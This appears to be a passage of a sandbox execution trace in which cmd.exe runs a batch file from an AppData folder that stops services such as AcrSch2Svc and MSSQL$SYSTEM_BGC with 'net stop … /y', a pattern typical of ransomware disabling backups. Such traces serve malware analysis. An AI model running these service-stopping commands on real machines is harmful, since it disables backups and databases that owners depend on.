0x3e0000 [0047.139] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0047.139] GetProcessHeap () returned 0x3e0000 [0047.139] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0047.139] GetProcessHeap () returned 0x3e0000 [0047.139] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0047.139] GetProcessHeap () returned 0x3e0000 [0047.139] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0047.139] GetProcessHeap () returned 0x3e0000 [0047.139] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0047.139] GetProcessHeap () returned 0x3e0000 [0047.139] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0047.139] GetProcessHeap () returned 0x3e0000 [0047.139] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0047.139] GetProcessHeap () returned 0x3e0000 [0047.139] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0047.139] GetProcessHeap () returned 0x3e0000 [0047.139] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0047.139] GetProcessHeap () returned 0x3e0000 [0047.139] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3e1290 | out: hHeap=0x3e0000) returned 1 [0047.139] GetProcessHeap () returned 0x3e0000 [0047.139] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0047.139] GetProcessHeap () returned 0x3e0000 [0047.139] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0047.139] _get_osfhandle (_FileHandle=3) returned 0x78 [0047.139] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x80d [0047.139] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x10b4, lpOverlapped=0x0) returned 1 [0047.139] SetFilePointer (in: hFile=0x78, lDistanceToMove=2085, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x825 [0047.139] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=24, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop AcrSch2Svc /y\r\nSAMA /y\r\ny\r\n /y\r\ny\r\nΓÇ¥ /y\r\nlures\r\nnded\r\n") returned 24 [0047.140] _get_osfhandle (_FileHandle=3) returned 0x78 [0047.140] GetFileType (hFile=0x78) returned 0x1 [0047.140] _get_osfhandle (_FileHandle=3) returned 0x78 [0047.140] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x825 [0047.140] GetProcessHeap () returned 0x3e0000 [0047.140] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0047.140] GetProcessHeap () returned 0x3e0000 [0047.140] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0047.140] _tell (_FileHandle=3) returned 2085 [0047.140] _close (_FileHandle=3) returned 0 [0047.140] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0047.140] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0047.140] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0047.141] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0047.141] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0047.141] _wcsicmp (_String1="net", _String2="CD") returned 11 [0047.141] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0047.141] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0047.141] _wcsicmp (_String1="net", _String2="REN") returned -4 [0047.141] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0047.141] _wcsicmp (_String1="net", _String2="SET") returned -5 [0047.141] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0047.141] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0047.141] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0047.141] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0047.141] _wcsicmp (_String1="net", _String2="MD") returned 1 [0047.141] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0047.141] _wcsicmp (_String1="net", _String2="RD") returned -4 [0047.141] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0047.141] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0047.141] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0047.141] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0047.141] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0047.141] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0047.141] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0047.141] _wcsicmp (_String1="net", _String2="VER") returned -8 [0047.141] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0047.141] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0047.141] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0047.141] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0047.141] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0047.141] _wcsicmp (_String1="net", _String2="START") returned -5 [0047.141] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0047.141] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0047.141] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0047.141] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0047.141] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0047.141] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0047.141] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0047.141] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0047.141] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0047.142] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0047.142] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0047.142] SetErrorMode (uMode=0x0) returned 0x1 [0047.142] GetProcessHeap () returned 0x3e0000 [0047.142] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0047.142] GetProcessHeap () returned 0x3e0000 [0047.142] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0047.142] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0047.142] GetProcessHeap () returned 0x3e0000 [0047.142] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0047.142] GetProcessHeap () returned 0x3e0000 [0047.142] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0047.142] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0047.142] GetProcessHeap () returned 0x3e0000 [0047.142] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0047.142] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0047.142] GetProcessHeap () returned 0x3e0000 [0047.142] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0047.142] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0047.142] GetProcessHeap () returned 0x3e0000 [0047.142] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0047.142] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0047.142] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0047.142] GetLastError () returned 0x2 [0047.143] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0047.143] GetLastError () returned 0x2 [0047.143] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0047.143] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0047.143] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0047.143] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0047.143] GetLastError () returned 0x2 [0047.143] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0047.143] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0047.143] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0047.144] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0047.144] SetErrorMode (uMode=0x0) returned 0x1 [0047.144] GetProcessHeap () returned 0x3e0000 [0047.144] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0047.144] GetProcessHeap () returned 0x3e0000 [0047.144] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0047.144] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0047.144] GetProcessHeap () returned 0x3e0000 [0047.144] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0047.144] GetProcessHeap () returned 0x3e0000 [0047.144] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0047.144] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0047.144] GetProcessHeap () returned 0x3e0000 [0047.144] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0047.144] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0047.144] GetProcessHeap () returned 0x3e0000 [0047.144] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0047.144] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0047.144] GetProcessHeap () returned 0x3e0000 [0047.144] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0047.144] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0047.144] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0047.144] GetLastError () returned 0x2 [0047.144] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0047.145] GetLastError () returned 0x2 [0047.145] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0047.145] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f3ff0 [0047.145] FindClose (in: hFindFile=0x3f3ff0 | out: hFindFile=0x3f3ff0) returned 1 [0047.145] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0047.145] GetLastError () returned 0x2 [0047.145] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f3ff0 [0047.145] FindClose (in: hFindFile=0x3f3ff0 | out: hFindFile=0x3f3ff0) returned 1 [0047.145] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0047.145] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0047.145] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0047.145] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0047.145] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0047.146] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop AcrSch2Svc /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop AcrSch2Svc /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop AcrSch2Svc /y", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0x9f4, dwThreadId=0x9ec)) returned 1 [0047.149] CloseHandle (hObject=0x78) returned 1 [0047.149] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0047.149] GetProcessHeap () returned 0x3e0000 [0047.150] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0047.150] GetEnvironmentStringsW () returned 0x3f8408* [0047.150] GetProcessHeap () returned 0x3e0000 [0047.150] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0047.150] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0047.150] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0047.463] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0047.464] CloseHandle (hObject=0x74) returned 1 [0047.464] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0047.464] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0047.464] GetProcessHeap () returned 0x3e0000 [0047.464] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0047.464] GetEnvironmentStringsW () returned 0x3f8408* [0047.464] GetProcessHeap () returned 0x3e0000 [0047.464] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0047.464] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0047.464] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0047.464] GetProcessHeap () returned 0x3e0000 [0047.464] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0047.464] GetEnvironmentStringsW () returned 0x3f8408* [0047.464] GetProcessHeap () returned 0x3e0000 [0047.464] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0047.464] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0047.464] GetProcessHeap () returned 0x3e0000 [0047.464] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0047.464] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0047.464] _get_osfhandle (_FileHandle=1) returned 0x264 [0047.464] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0047.464] _get_osfhandle (_FileHandle=1) returned 0x264 [0047.464] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0047.465] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0047.465] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0047.465] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0047.465] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0047.465] SetConsoleInputExeNameW () returned 0x1 [0047.465] GetConsoleOutputCP () returned 0x1b5 [0047.465] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0047.465] SetThreadUILanguage (LangId=0x0) returned 0x409 [0047.465] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0047.466] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0047.466] _get_osfhandle (_FileHandle=3) returned 0x74 [0047.466] SetFilePointer (in: hFile=0x74, lDistanceToMove=2085, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x825 [0047.466] GetProcessHeap () returned 0x3e0000 [0047.466] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0047.466] GetProcessHeap () returned 0x3e0000 [0047.466] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0047.466] GetProcessHeap () returned 0x3e0000 [0047.466] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0047.466] GetProcessHeap () returned 0x3e0000 [0047.466] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0047.466] GetProcessHeap () returned 0x3e0000 [0047.466] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0047.466] GetProcessHeap () returned 0x3e0000 [0047.466] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0047.466] GetProcessHeap () returned 0x3e0000 [0047.466] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0047.466] GetProcessHeap () returned 0x3e0000 [0047.466] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0047.466] GetProcessHeap () returned 0x3e0000 [0047.466] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0047.466] GetProcessHeap () returned 0x3e0000 [0047.466] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0047.466] GetProcessHeap () returned 0x3e0000 [0047.466] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3e1290 | out: hHeap=0x3e0000) returned 1 [0047.466] GetProcessHeap () returned 0x3e0000 [0047.466] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0047.466] GetProcessHeap () returned 0x3e0000 [0047.466] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0047.466] _get_osfhandle (_FileHandle=3) returned 0x74 [0047.466] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x825 [0047.467] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x109c, lpOverlapped=0x0) returned 1 [0047.467] SetFilePointer (in: hFile=0x74, lDistanceToMove=2115, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x843 [0047.467] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=30, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop MSSQL$SYSTEM_BGC /y\r\ny\r\ny\r\n /y\r\ny\r\nΓÇ¥ /y\r\nlures\r\nnded\r\n") returned 30 [0047.467] _get_osfhandle (_FileHandle=3) returned 0x74 [0047.467] GetFileType (hFile=0x74) returned 0x1 [0047.467] _get_osfhandle (_FileHandle=3) returned 0x74 [0047.467] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x843 [0047.467] GetProcessHeap () returned 0x3e0000 [0047.467] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0047.467] GetProcessHeap () returned 0x3e0000 [0047.467] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0047.467] _tell (_FileHandle=3) returned 2115 [0047.467] _close (_FileHandle=3) returned 0 [0047.468] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0047.468] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0047.468] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0047.468] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0047.468] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0047.468] _wcsicmp (_String1="net", _String2="CD") returned 11 [0047.468] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0047.468] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0047.468] _wcsicmp (_String1="net", _String2="REN") returned -4 [0047.468] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0047.468] _wcsicmp (_String1="net", _String2="SET") returned -5 [0047.468] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0047.468] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0047.468] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0047.468] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0047.468] _wcsicmp (_String1="net", _String2="MD") returned 1 [0047.468] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0047.468] _wcsicmp (_String1="net", _String2="RD") returned -4 [0047.468] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0047.468] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0047.468] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0047.468] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0047.468] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0047.468] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0047.468] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0047.468] _wcsicmp (_String1="net", _String2="VER") returned -8 [0047.468] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0047.468] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0047.468] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0047.468] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0047.468] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0047.468] _wcsicmp (_String1="net", _String2="START") returned -5 [0047.469] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0047.469] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0047.469] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0047.469] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0047.469] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0047.469] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0047.469] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0047.469] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0047.469] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0047.469] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0047.469] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0047.469] SetErrorMode (uMode=0x0) returned 0x1 [0047.469] GetProcessHeap () returned 0x3e0000 [0047.469] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0047.469] GetProcessHeap () returned 0x3e0000 [0047.469] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0047.469] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0047.469] GetProcessHeap () returned 0x3e0000 [0047.469] RtlAllocateHeap 